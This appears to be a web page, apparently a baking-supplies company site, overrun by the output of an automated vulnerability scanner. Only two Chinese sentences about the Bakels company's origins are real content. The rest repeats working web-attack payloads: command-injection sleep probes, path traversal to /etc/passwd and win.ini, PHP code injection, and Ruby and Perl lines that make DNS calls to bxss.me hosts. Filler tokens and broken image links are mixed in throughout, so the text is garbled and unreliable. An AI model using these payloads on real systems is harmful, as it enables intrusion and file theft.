!(()&&!|*|*|
)
"||sleep(27*1000)*ypoazg||"
'||sleep(27*1000)*akgfqj||'
"&&sleep(27*1000)*rcpsuz&&"
'&&sleep(27*1000)*himsvl&&'
^(#$!@#$)(()))******
'"()
1VrYHroiO
!(()&&!|*|*|
1CPl6DPGO
bxss.me
![1](/content1/20/bxss%2Eme)
555
/etc/shells
![1](/content1/20/bxss%2Eme)
555
http://bxss.me/t/fit.txt%3F.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Http://bxss.me/t/fit.txt
![1](/content1/20/bxss%2Eme)
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.
![1](/content1/20/bxss%2Eme)
555
./Mr.
![1](/content1/20/web%2Exml)
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.
![1](/content1/20/bxss%2Eme)
555
../Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
file:///etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
../../../../../../../../../../../../../../windows/win.ini
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
../../../../../../../../../../../../../../etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
bxss.me
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
c:/windows/win.ini
Mr.
![1](/content1/20/bxss%2Eme)
/etc/shells
Mr.
![1](/content1/20/web%2Exml)
./555
Mr.
![1](/content1/20/bxss%2Eme)
http://bxss.me/t/fit.txt%3F.jpg
Mr.
![1](/content1/20/web%2Exml)
../555
Mr.
![1](/content1/20/bxss%2Eme)
Http://bxss.me/t/fit.txt
'+'A'.concat(70-3).concat(22*4).concat(99).concat(80).concat(116).concat(85)+(require'socket'
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
"+"A".concat(70-3).concat(22*4).concat(120).concat(66).concat(122).concat(89)+(require"socket"
555
Mr.
![1](/content1/20/bxss%2Eme)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
file:///etc/passwd
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../windows/win.ini
Mr.
'+'A'.concat(70-3).concat(22*4).concat(110).concat(69).concat(97).concat(81)+(require'socket'
Socket.gethostbyname('hitiz'+'zwgjybbx6d227.bxss.me.')[3].to_s)+'
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../etc/passwd
Mr.
"+"A".concat(70-3).concat(22*4).concat(104).concat(81).concat(118).concat(67)+(require"socket"
Socket.gethostbyname("hitsb"+"jicemfeybf7a2.bxss.me.")[3].to_s)+"
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
555
Mr.
![1](/content1/bxss.me/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1//etc/shells/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/./20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/../20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/../../../../../../../../../../../../../../windows/win.ini/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/../../../../../../../../../../../../../../etc/passwd/web%2Exml)
555
'.print(md5(31337)).'
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
${@print(md5(31337))}\
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
${@print(md5(31337))}
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
";print(md5(31337));$a="
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
';print(md5(31337));$a='
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/contentbxss.me/20/bxss%2Eme)
555
Mr.
![1](/contentbxss.me/20/bxss%2Eme)
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content/etc/shells/20/bxss%2Eme)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content./1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/20/bxss%2Eme)
555
Mr.
![1](/content../../../../../../../../../../../../../../windows/win.ini/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content../../../../../../../../../../../../../../etc/passwd/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
'.print(md5(31337)).'
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}\
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}
Mr.
555
Mr.
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
";print(md5(31337));$a="
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
';print(md5(31337));$a='
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/ZZZTest8134%2Ejpg)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/ZZZTestEXIF1075%2Ejpg)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
555
Mr.
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
Mr.
![1](/content1/20/%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255cwindows%255cwin%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afwin%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/boot%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/'.print(md5(31337)).'/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/${@print(md5(31337))}\/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/${@print(md5(31337))}/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/';print(md5(31337));$a='/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content'.print(md5(31337)).'/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content${@print(md5(31337))}\/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content${@print(md5(31337))}/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content';print(md5(31337));$a='/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
".gethostbyname(lc("hitde"."gedmcxylddfe6.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(121).chr(74)."
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
'.gethostbyname(lc('hithy'.'ipdygdynd3a8e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(82).chr(109).chr(79).'
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
".gethostbyname(lc("hitvu"."uivmlmoa1bc9d.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(66).chr(103).chr(81)."
Mr.
'.gethostbyname(lc('hitzm'.'xayhxfwl1bd84.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(104).chr(71).'
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
![1](/content1/20/%27%2Egethostbyname%28lc%28%27hittc%27%2E%27ozxzonkue469f%2Ebxss%2Eme%2E%27%29%29%2E%27A%27%2Echr%2867%29%2Echr%28hex%28%2758%27%29%29%2Echr%28108%29%2Echr%2869%29%2Echr%28103%29%2Echr%2876%29%2E%27)
555
bxss.me
![1](/content1/20/bxss%2Eme)
555
c:/windows/win.ini
![1](/content1/20/bxss%2Eme)
555
/etc/shells
![1](/content1/20/bxss%2Eme)
555
http://bxss.me/t/fit.txt%3F.
![1](/content1/20/bxss%2Eme)
555
Http://bxss.me/t/fit.txt
![1](/content1/20/bxss%2Eme)
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.
![1](/content1/20/bxss%2Eme)
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.
![1](/content1/20/bxss%2Eme)
555
'+'A'.concat(70-3).concat(22*4).concat(116).concat(67).concat(104).concat(73)+(require'socket'
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
"+"A".concat(70-3).concat(22*4).concat(104).concat(90).concat(98).concat(84)+(require"socket"
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
'+'A'.concat(70-3).concat(22*4).concat(102).concat(81).concat(107).concat(71)+(require'socket'
Socket.gethostbyname('hitln'+'lbtidtca92e95.bxss.me.')[3].to_s)+'
Mr.
![1](/content1/20/bxss%2Eme)
bxss.me
Mr.
![1](/content1/20/bxss%2Eme)
c:/windows/win.ini
Mr.
"+"A".concat(70-3).concat(22*4).concat(115).concat(84).concat(98).concat(71)+(require"socket"
Socket.gethostbyname("hitcj"+"pqwzpjfu0250b.bxss.me.")[3].to_s)+"
./Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
../Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
/etc/shells
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
http://bxss.me/t/fit.txt%3F.jpg
Mr.
555
file:///etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
Http://bxss.me/t/fit.txt
../../../../../../../../../../../../../../windows/win.ini
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
../../../../../../../../../../../../../../etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/web%2Exml)
./555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
../555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/bxss.me/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
file:///etc/passwd
Mr.
![1](/content1//etc/shells/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../windows/win.ini
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../etc/passwd
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
'.print(md5(31337)).'
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
${@print(md5(31337))}\
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/./20/web%2Exml)
555
${@print(md5(31337))}
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/contentbxss.me/20/bxss%2Eme)
555
Mr.
![1](/content1/../20/web%2Exml)
555
";print(md5(31337));$a="
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content/etc/shells/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
';print(md5(31337));$a='
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/20/bxss%2Eme)
555
Mr.
![1](/content1/../../../../../../../../../../../../../../windows/win.ini/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/ZZZTest6966%2Ejpg)
555
Mr.
![1](/content1/../../../../../../../../../../../../../../etc/passwd/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/ZZZTestEXIF820%2Ejpg)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
'.print(md5(31337)).'
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}\
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content./1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
";print(md5(31337));$a="
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
';print(md5(31337));$a='
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
![1](/content../../../../../../../../../../../../../../windows/win.ini/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content../../../../../../../../../../../../../../etc/passwd/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/'.print(md5(31337)).'/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/${@print(md5(31337))}\/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/${@print(md5(31337))}/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255cwindows%255cwin%2Eini)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/';print(md5(31337));$a='/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afwin%2Eini)
555
Mr.
![1](/content1/;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/boot%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content'.print(md5(31337)).'/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content${@print(md5(31337))}\/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content${@print(md5(31337))}/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content';print(md5(31337));$a='/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
Mr.
555
".gethostbyname(lc("hitjz"."vhjpmdpva7dfc.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(116).chr(90)."
555
'.gethostbyname(lc('hitnz'.'cjoovzqha89cd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(68).chr(106).chr(84).'
555
Mr.
555
Mr.
555
Mr.
".gethostbyname(lc("hiteq"."hbqgyimna05ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(81).chr(109).chr(66)."
Mr.
'.gethostbyname(lc('hitty'.'paefryhm633b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(77).chr(111).chr(87).'
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
碧琪集團的名字來源於荷蘭商人 Bakels 兄弟于1904年在荷蘭阿姆斯特丹註冊的碧琪公司。其中的一個兄弟 Bernard J. Bakels 使碧琪聲名遠揚。
今天的碧琪集團是一個名符其實的全球性公司,在全球各地都有生產廠家和精挑細選的代理商。碧琪公司的產品在120多個國家都有銷售,供烘焙食品行使用。
Mr.
![1](/content1/20/%27%2Egethostbyname%28lc%28%27hitbo%27%2E%27emztecow5cc2a%2Ebxss%2Eme%2E%27%29%29%2E%27A%27%2Echr%2867%29%2Echr%28hex%28%2758%27%29%29%2Echr%28104%29%2Echr%2869%29%2Echr%2899%29%2Echr%2883%29%2E%27)
555
Mr.
555
Mr.
555